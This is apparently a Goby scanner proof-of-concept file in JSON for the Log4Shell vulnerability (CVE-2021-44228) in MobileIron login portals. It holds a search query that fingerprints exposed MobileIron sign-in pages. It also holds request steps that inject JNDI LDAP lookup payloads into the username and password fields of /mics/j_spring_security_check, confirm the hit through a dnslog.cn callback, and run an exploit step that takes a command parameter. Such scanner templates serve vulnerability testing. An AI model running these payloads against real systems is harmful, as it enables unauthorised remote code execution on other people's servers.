{ "Name": "MobileIron Log4shell CVE-2021-44228", "Level": "3", "Tags": [ "rce" ], "GobyQuery": "( title=\"MobileIron System Manager: Sign In\" | title=\"MobileIron User Portal: Sign In\" | title=\"MobileIron Benutzerportal: Anmeldung\" | title=\"MobileIron 用户门户:登录\" | title=\"MobileIron Portail utilisateur : connexion\")", "Description": "MobileIron存在log4j漏洞。", "Product": "MobileIron", "Homepage": "https://www.mobileiron.com/", "Author": "aetkrad", "Impact": "", "Recommendation": "", "References": [ "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" ], "HasExp": true, "ExpParams": [ { "Name": "cmd", "Type": "input", "Value": "${jndi:ldap://dns.log/tea}" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "http://www.dnslog.cn/getdomain.php", "follow_redirect": false, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "dnstest|lastbody||" ] }, { "Request": { "method": "POST", "uri": "/mics/j_spring_security_check", "follow_redirect": false, "header": { "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "j_username=${jndi:ldap://{{{dnstest}}}/tea}&j_password=${jndi:ldap://{{{dnstest}}}/tea}", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [] }, "SetVariable": [ "output|lastbody|regex|" ] }, { "Request": { "method": "GET", "uri": "http://www.dnslog.cn/getrecords.php", "follow_redirect": false, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "{{{dnstest}}}", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "POST", "uri": "/mics/j_spring_security_check", "follow_redirect": false, "header": { "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "j_username={{{cmd}}}&j_password={{{cmd}}}", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "PostTime": "2022-01-10 13:53:47", "GobyVersion": "1.9.320" }